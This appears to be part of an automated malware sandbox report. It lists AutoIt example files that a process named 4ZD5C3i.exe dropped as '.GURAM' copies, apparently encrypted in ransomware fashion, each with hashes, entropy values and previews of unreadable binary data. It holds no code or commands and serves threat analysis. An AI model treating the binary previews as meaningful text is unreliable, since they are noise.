                                                                                                                                                                                                                                                SHA1:C3DE1CA343E4EC1941BF9D7164B28DC9AC3A4641
                                                                                                                                                                                                                                                SHA-256:AB567CD13DA33CE507A1172A0E4223032B0EDB3330A3647EC99D0648232DC7C7
                                                                                                                                                                                                                                                SHA-512:DAA4FBCAB44777C6C0C2E1136EDB71FECF9352745B73E94019EFFC14E58737CD063742C64D89F3D8E566BC272A81F38DADFFF3945BF4465E5FA5FA56DCBC5812
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...b..C^A..V.. 9.i-7....}y`..z...g..>..U..=<J..`.G.J..........&....We.,j.....+.V._k<1...1..*.........Q.>>j.xo..{.&l%.U. . ....BClR.z....+..!..,s..t...P.h.R.3..eBj.I)....S.X.Cte.f....fm ..f....}..)....4..#.....X.R......(.RuC.....vd+...Rc.......L.6.e..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.t<.....Nc..I.US~o..........>....?=.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\NoTrayIcon.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):992
                                                                                                                                                                                                                                                Entropy (8bit):7.779674415149231
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:kq46J7KtGml+25C5HPvxZxkcujmJrc0YXUZtwsTSCL8a:kq46J7M/l+hTxs4o0jZtw/I
                                                                                                                                                                                                                                                MD5:E80F56F04CD973978A2D11031FDF26D6
                                                                                                                                                                                                                                                SHA1:5DD91DD8FC3D5B0D648FD7697324D21D5342C89F
                                                                                                                                                                                                                                                SHA-256:A10AB5F53C4E2DF1ADF3DFC00C060AA8223939A345A9D8FBBAFF19E4E4BBCC58
                                                                                                                                                                                                                                                SHA-512:EC9F956D475694A2BFE47CC68C48D0D09B8FAEE7B73EAEA9A8F9F598B8D05F9B2232E9C2D010DCAB19A92745BB887F0490DE2D89489EEF4760AB61067BF9FA69
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:_...n.h.!.....M....#E.9S.....8Q~.8..t41..Y.`..N...w>...........B........W.0-..34.--...0...r...w..`_.R....c...[..LW........+.x.Y....yn...f..eh.80..F;.....p.1....V...sV!..c..4O.Xb..8e.bph..`.'f.T...`.z....N:....n.G.4b.p|...JK..;.!...E........."rQ...y.*...$..Bz./Q....._..W.....]..I....%HR8.R..1.............'..?..)..~.......s.z.Y.o..Q...._.^..G.."Y..\....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.?..T...)N.D.tf.. .r.T}...NdhoVE.L....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Null.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):751
                                                                                                                                                                                                                                                Entropy (8bit):7.68773422260907
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:UEKH1KEr6oTDMq2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZogs+:1JxonMfjmJrc0YXUZtwsT1spgD
                                                                                                                                                                                                                                                MD5:6BECBC04D1238FC2D2D2937C866C7A03
                                                                                                                                                                                                                                                SHA1:AC1806E52EC7A4FE93BF127B3FDBD3BD4058F923
                                                                                                                                                                                                                                                SHA-256:A7413FF4812CAEECAEC924CF3CDA7ED02E4C82A1F05AA4D6978636E82A882A92
                                                                                                                                                                                                                                                SHA-512:F18FEA1FF0EFE74598561FB84CBED60C14E151F991577BD65727B2927DEBE73DB1DE4F9E665E7F5928DB96524D1C39A5991DA000FADB0130A45308D07E0034F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.dt..EA}..2.J.:..9ki<..`.1.3.R .n....3R] ..Y...2..j.....n..%3k......@.......b.<4..v..~...9.EDS`......).Y..S./(G.w#.(.w...Z*.....Hr.b|..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.C.~...[..D....Mf...p~...-.I}.l^......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Number.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2124
                                                                                                                                                                                                                                                Entropy (8bit):7.899577163856014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:X7k4JBfFlXb2xowoF3028xVdqeAHAizD4Feo4o0jZtw7ExO:Y6X0g3PCkZZXemle7qO
                                                                                                                                                                                                                                                MD5:175527701705B9905C186063787098CE
                                                                                                                                                                                                                                                SHA1:EFF375F93E22B6356FBA21DD00736D111F1FE473
                                                                                                                                                                                                                                                SHA-256:6BD2661A0D9670B900BE8E8A41007FCBE7C4300DD0311C46B8979EC63C5DF9FE
                                                                                                                                                                                                                                                SHA-512:64C2BA651B1B814F644C532A2ABFCA5C072D4F51E6C1985775CA2F4BDC0D25BBFA2E718332C089B21B6B859199F59BBC1348BCA7EF2E69EF1D2CAFA50069C310
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.7...*..e..".*...x....F..r.S..n2....:..'....t....#..|....T,....<...r522.5..^.2./C.9....i..P6..L.^..k...[ty...].e.5....l.*OrN..s.........Jb..n...U.0..t..7.NL9.........v...E...h....l.<e..y..."..........Q...`..;5...+..........Q B.O%0....8]<.<(~..=....q.;...(.c.co....T.?._.+...m,..&..P.wl..er.....`......1Nq0.mk...Z^,d.W..%..r..7...o9..G...zFJ......-'.S..]..VF{T.w8^..A....m<T..W#.E..L.e.`.&D....4.+6.8...x?..P]._e.?........w..B..*..c....q'..@<a.Dk.J....?r.1.....}.[~a[...0.+A.....j_..rgm.....3.}Q....n....@...7........F.(......E.+. .....ON.H..........>+&D.....I2.G.}...6v....."oJd..A.....MN..T-....S........`j.-`.$.%5..W.Y..Y......e....!..'...p5.+.)(\..2.e.UYj.P....+........n.[%....+.....@?.. ..h..To....~.b.....-.....rM..0...K0..o...Mc6y>.t........+.&...1mk]8...F.(`[k....t..Su..y..A.2.v.Pf._......[..L....+...{G..h.v..E.......*....-sq.2e>`..E{[...V.{y..........|.w...V.o.P.....1........`.k.EY.7s.}....U/....6|L....,T..m.H.#2m..>h.>Vg.i.H.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjCreate.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1191
                                                                                                                                                                                                                                                Entropy (8bit):7.8191153350909355
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:GeFpvqj/l/0Pk+bpWrLk3y12jmJrc0YXUZtwsT3cOJ:ZFpiDF0Pkf4i24o0jZtwkX
                                                                                                                                                                                                                                                MD5:367E5115F7E87796F2D523E01DC6D415
                                                                                                                                                                                                                                                SHA1:1AB1BAF7B5C200CF3B01365B1957DFBF77282182
                                                                                                                                                                                                                                                SHA-256:9FA182AB68D0A100058722AC99E97A8F770F06E70F76FCD20C9EDEFE467D199D
                                                                                                                                                                                                                                                SHA-512:BF9643691DC04B64C139CA9B0549CC52B6031234C7B26C9194FC186A9D2A117B5E7D0C606AA165B3A0E529FCA4EDD1A858AC6EB6B513FF945A496ECA59FA011E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..c'.g;.A...{..ht...7Y..1.%....F...0..#... ..Cx$.\...$...../...w\h..?p.*.~.....E.7...7..vM.>S.....,...BX...0.<.y................k]#M...M...\.......6.?...,.C.J.....r..3.$rvT..~..%w....3..@R26O.d....H<E.Tf...u.#}.t.Z.0./A..R...:.....r_...A.<.`...1uT.q.r.v..IO....F..l....tq.n.'<....a...=...........8)8 .nJ..\...|L$....d..N..:Y..s..ET$....*`...+....*.;W..b...N.E.Z..~......b......a.o.{...K?m....3A8...{|..F.............sH1+[.eM.....=..|..9..67.c....m.y.w.zq...>.......::....q...N3....#.=v...h}Se.n..n.............+.u......LV..z..+V.. 1e..d.$.H.S--Y+...p.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mk

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjCreateInterface.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1992
                                                                                                                                                                                                                                                Entropy (8bit):7.893868396517833
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:EdbqT0NL1OkJ1kK9G5Epr1uyliD64I4o0jZtwaJy:DSoRepr13lizZleaJy
                                                                                                                                                                                                                                                MD5:7B63F6313F079BF3B39A00AB8797CBDC
                                                                                                                                                                                                                                                SHA1:9889BE2EF7696534ADED980B7925050FE935CFD9
                                                                                                                                                                                                                                                SHA-256:076456082706388D8C0A1061BBF145A6ABFF38CCB54512CB771D99CD29FA2FD5
                                                                                                                                                                                                                                                SHA-512:8D128FCCF6AB170BFF4B95E4CBEEC965714A44CA9DF3D90D503BC89CD9CE68DD175433ED4F5541FA341472D52A2CEC406F424EC0158832B4344FDBE17BDD4A55
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o....i8C.T.....L./3#......^A.3..h....Q_.....b.m.S}..eiW.P.....=...-'....p.7l{U.`d.5.t.....4./...j...i ...:j.......}...../Cb.........F..B78.].zt.EW....i.;.V.....`.V$....WI...F...._..:.8...Z]..q..L..2.6..=...e..~...s....K.J.a.g.2..."I.WV.."...vHG.;...f...c.s^^..v.9....(t..w.2.j`.X.._...+|r..o^.ok....M.y..._|.....#...o.k},..jH.Y.B$. >...sy...#.....~_QF.....g......]}.'C1..q..5..n.m.}..f...L..0.<...(<.1.p....v.7^.M..u.o...id.q.~9..,.V...\.=.}....A1....F.{."$...m....-.][W.T...A._.t.....I.D..I2.x#<..Q.......P..{..F.J3..L....3..O. D.......Q...Z]..{q*...Y.g.-..cB$..`bo..g....~!.....O...pv...J.l..D.N.;.j..n...xk"X...P....j....eL.i?...U.%.....)j....3d....=........../+,.....q._+.X..\....N.lx.........1.....U...... .w.........1c.#...@[gnK.w..T....W.|......q%1j.."......+..>LXt..EA|.;....../...m.Vgd..A.xE2.....H...........I&;..W. V.g+....c.. .B.<.............W.f.4...3S.V....7'.n..^(H.n\..@.*@.)..]8.?.6.S'..-(\.!.`6..1.]qb...>...F..3w..^K..S...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjCreate[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1123
                                                                                                                                                                                                                                                Entropy (8bit):7.8109726037518135
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:eHu/lW0Iyp53uz7cCrTv2jmJrc0YXUZtwsTOhO:rlWfyp5ez7xvI4o0jZtwLO
                                                                                                                                                                                                                                                MD5:2034623B368729C3025E4B094F90F22B
                                                                                                                                                                                                                                                SHA1:37C38E44114D6517030454FFD7AD998C4B75E81E
                                                                                                                                                                                                                                                SHA-256:1898AC8DDE34B815D2809CD39B7011AF1D436F21E5789FBC5E59731E35CFCEB6
                                                                                                                                                                                                                                                SHA-512:69DE1C90AFD2BD55C2B4942AEC01D7F900852A01BDFA8BEE597AB84EE00350F35F2F9FA45766D4E131EBEE2F08BBD82DCB26FD68A45ADBEA0601B809B03F85F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<8....@WB...%.(....!1p=-.d...G`.......S.;.hwC......5.\._q.g.b.....A..-,o.=*.......qu.w.O.....t....I....f8....W..u.!.-........|R.E...O-.........0.YW&...Hw...NR.!..#...'..[....Y...3...k.cu.(.U.[rT...9.a.=,..%|.?.+.."...D.V.5j......F76..H>.u{.4.,..uk...RZ+.......U.R..sNw.....k=.3..+`.g.p.:..H..rE]E{...m.J...A.....,.4.%.^.:5......6.....?-..6..:.J....M.'..wh^hE.A`.k...e/..Xdw.E....i...G.{j...U....3...1z.#...!..]kn..,.....N.KG&.!Y..60.'...Ad%........4..e....Mu...{.6]...Pi........q......g"L..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjEvent.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3695
                                                                                                                                                                                                                                                Entropy (8bit):7.936894841499305
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:QECip9skaSr8LHoizmEOFa+5aPFpRHQCAlel:Qi9sxSr8M9EWantHQnUl
                                                                                                                                                                                                                                                MD5:6661334F3FE4EDE124459BE15C368E5C
                                                                                                                                                                                                                                                SHA1:4361CB374A6E4AC77603646B117B05D28AD8A91C
                                                                                                                                                                                                                                                SHA-256:FAC218A5CED3B525C950A21A3FBC336A1E9B85B16CB974CA92546C54D991610C
                                                                                                                                                                                                                                                SHA-512:04F53EC365551ED956DE8BAFF5D3FCD389D1A6DA6B37C66BC749D2C08297EAF067BAAC09F24C42E972D0456712F718261E1E3CB82D2EFC2CE9F215FEF9278D23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o3.w'.$9.Z...q...N......q.,8y....t...h..a...(.0..-....h...I.xE.... ..../.....6k.I4.k gi..;.4..SdJ.Ih..)...-.).A.%...I._...1:q.........[/..z..z.RuFs..f..l..b+x...U..b........=..L.u...JE$jz.s.1...H.vk.<.9S..6..=.....%)T<.."F.....V.%.T.......o....?...>.Ni,.jH.*..Xv....N...9_K.z..I...b`...9...1d.&..'.D.?nz......(..|D.6...z.9.G!..X.......Q#...#.r.=......yH.....p..&..a...S.S....f..u......$.F# .s>*...Z.S:..z .Cr..d.V..6._....#..C.U~..:H.n..&...z.g.-}9...I-..-..$.Q.f>..W9..sg!.:\...t,...}O...n.r....i....1..........l/..1C.P...QL~..a.Nj...*.x.4,...O....^..=..a.`..a.&.&...-....cqO'....f.X.!..............t...".....-.._T;..j...h..C.d6....?.#..R..K-I....E.:.s...T]..?..U...b.-v05..SXc...{......A0..&4*..6v.a..._,KO.(...n..w...F.st.6A...p6\^/..l.].h`4..... .|.3.;.......i=Y.R..........Vq...G...Q6p8N.-B.......3.........N..-9.8:.XC.~.J...Xq...U....u*..m`|}...?..gm./.^21-.m...........VD...u..&s.nx].![.s..k...........0..~e......f_@.......6Wx.m.@..N.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjEvent[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1512
                                                                                                                                                                                                                                                Entropy (8bit):7.859605034483846
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:7r1I6fqil2wFERaX8AlNcaEtfRRvjmJrc0YXUZtwsTWhc:7BIo2wFE4XzLcbfrL4o0jZtwy
                                                                                                                                                                                                                                                MD5:F661EDC9628E59899B23DDBBCAB655B1
                                                                                                                                                                                                                                                SHA1:B06CADECF70F6CCA714D03C66995487F226B4D85
                                                                                                                                                                                                                                                SHA-256:11170F0E0AAA59C306E9CFF565ABBCF5E996CA2715EC7D78D4E65841244F842C
                                                                                                                                                                                                                                                SHA-512:F079FD8799A66964D0055E54A526467E91F0C4F35428D0F1F6BAE8A0BF1CB1F6F9E4AD7F822A049E976451EF30B12BF343EB610A1F414B868CAAB573EFE4034E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U..../&}5.p.......sEG4~8.Hh_..x.:..i%.>IZ..$...e.i..kN.*........)..T...B.g_..$..y?....D...]K|`.t.&...z..-...*^w/).o]K.?..'........5.L....V..7"......@..].. ..h.,k..y.CJ..^h..F./j.d%....k.......A.m..A....o..d4..Z.or..H...1....N~^....G.l.K8.Y)....w.t.....(.*G..Q.....5,....x.\....Ayv.....&.g.r..f......+.7......10...%.<...^...#.n.O.9K.L..~.@...fN.E@.J|._..&..^...C...~u...+.{......'^d.#....".>..........M.&<.....=...ds..../v..S{..;`....].K..`.I-.z..t.n..f.....B.,..DS.`...L......}.Y.......44..e....Jn.@MP0{.E.n.......(....L..a:.Gs..kA'..nq..m..>.%...x.......;|..>.1.....5.J+.DqW..........fv......7G....?.u!IZO..>..x.wm.....Ib..`..>y.I}.m].....=.A..6L..(.7.a.....f_\...&.,...9...C...|..3s.......U...Q...7U......|..6.. ....D..;....0....H....iY|....F;.H...EK.....K9....BQ..ld..+...`.l..~..6..cW.k9....s.i.v.em_.tN7C..B....M.[ .<$F..`.s.4+.[..W.......^...`....>.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjGet.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                Entropy (8bit):7.820581805853838
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:X+Vkj6JiYmAhHOAWTLzKbBywgTCoWYFXAMUabfKjaGJYIsS+WwgHIc0jmksXU4HH:X+H/BWTLMTOlyjmJrc0YXUZtwsTKAc
                                                                                                                                                                                                                                                MD5:C5D31DF7B81356EC9E5EE5C690747704
                                                                                                                                                                                                                                                SHA1:D43BC9ED28307B5200404E89CA98216BA8E1E435
                                                                                                                                                                                                                                                SHA-256:A27A29673F0E47804D6678DB7D770C2154272BF87588A1EF5DA53B0BC510CF48
                                                                                                                                                                                                                                                SHA-512:03DBFC842A33DC8A8559F18AC6445F6B488B2E48B3B6F67700C2DF90F0218ACFB89D33CD051409E2743544112EDB77181BD8D3A7417A67DB619B1BC1044A8AF7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T.aC.X@....+L...s#.W.KO..O..(.I.....]..".....|... .![..CdV...y7...F..S.I.......>.&..e..@.G....&%.`2..v..-|.......?.V...Q.~w...B..;#..e..kZP..{GU..O.'f.E.O.......'...{....m.Yd.m.l.|....^[.t.....=..|i....sq(..7(Dq*..._.fH.a..q.e'.-..H.l...{.s..q..G..&.........j.........s.}....].,B...].......}.I....k.....u..*R....8.P....K.5t....kf_n.:.*..`.....5>..N!.|.....@....Dy..T..].'..6bMZ..K.._.X....O..S.;.f......H...{.8..{......\....Gx.DRHsU:..8x..oKuP@...&...J...y.-...q.G.,=.I...S}.1....Q..$.d....E.~n..[./..^}.&...r..X.w.:...<...@.]....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjGet[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2024
                                                                                                                                                                                                                                                Entropy (8bit):7.9040677614826915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:kk5Xeiqfulg5Il2DJap7neH/65nObMk8X4o0jZtw2:kwqfulIESY7pl0le2
                                                                                                                                                                                                                                                MD5:6D1C08BEEC08606700C204879CF468EB
                                                                                                                                                                                                                                                SHA1:FFA61D07D7669F678902E87D95A6CB8BCDB63D33
                                                                                                                                                                                                                                                SHA-256:8F219959F3A8825C5CA78B2A217B9E6F10DA52B986A12C064ABDB4FF9818C17D
                                                                                                                                                                                                                                                SHA-512:69B331C38F5AECB389FB04F1344EF260A81259010866980706FC257C7384630751415791B3C8E806481CE8E09E55806900E5E6620570E2A99DBDFA49F4EC87E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..dt.B+L.,\...\........Q.6..qt.Ns.3..T...Z.QD....'.C.x.WH.!.pp.3/]nn.....{....NZJ..$k.Hx4.. .~Ugj...k../...l.\..q.o.....K..0.]...#.3.Y.p...?. I>.+...X...e..I.h#.m_|j......l.ej....~..u.....L..x,...7.U=..B.V1srI..9]k...XX,.E..9I.U....b......+.{..3.6Uh<7J...Q..P=_.....r.-p...T....r..UZ4.3.E..u.S...(.#$3.h-....M`m.`W6lsn..w....[..qa.@H.6(..h.2B}..V.cpoc..........!I.*>..&....l.A+)..Y*;..[.%"jC.Rv!.E.......g}....S.-..L...Q...q...7z(<...D...aD-[.-.h*......./.^a.W.y.C........o..H...~........kbL...w..Z{/.,.........?...e.(i.o.9..U.....%...&M.Wn.P9...o;.w(.EO.%V}y..-.,.....L...)q..~[E.2.4u..\z.!.....uN...B...\./..6.hc.=.........#.o0.X...E.....N+J,/...b....4...y]$.;.[.5..J.*.}....M.Tn...e....zP.=i.?....C*.k...K......F[.G`.v..T@l&P....y[i.r...W....l.+.Lm..c-.x.......|..gd.....\....JG..zDk.....Dze."i.F ....tx....`......V...........0...!.[..% ..x....d.......r9.nCLp.h,..<.....<..|.x4.'<.UP...*c.....d{M.).[z;.x...5.........0...n........<....3.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\ObjName.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1479
                                                                                                                                                                                                                                                Entropy (8bit):7.865538669192979
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ibNSAS1ELzIQfWXiGNKWwfX6FvXIWSfuCCdTNQYJ8vN3GCjmJrc0YXUZtwsTijy:cNSASMUrBN3sSvYWS5ClcvBP4o0jZtw8
                                                                                                                                                                                                                                                MD5:C8025EE51489B2E14C6A5C47E6776F50
                                                                                                                                                                                                                                                SHA1:6EB0CBC68D4C05D71694D4A16203DD6B2DE68D52
                                                                                                                                                                                                                                                SHA-256:071E02F0B7775EEE09ABDF778E2151BEC0E7FD260D472B92B3B585C082C0073D
                                                                                                                                                                                                                                                SHA-512:0FA8B2609E63040DEF3705CDDAAEE2815C12E38DF97DE3832F4686AC7D61454725C5CC36F4EDD2A6D7794AB2488B9A00F31629B1F112C893B4E7EB1A75F4CD02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
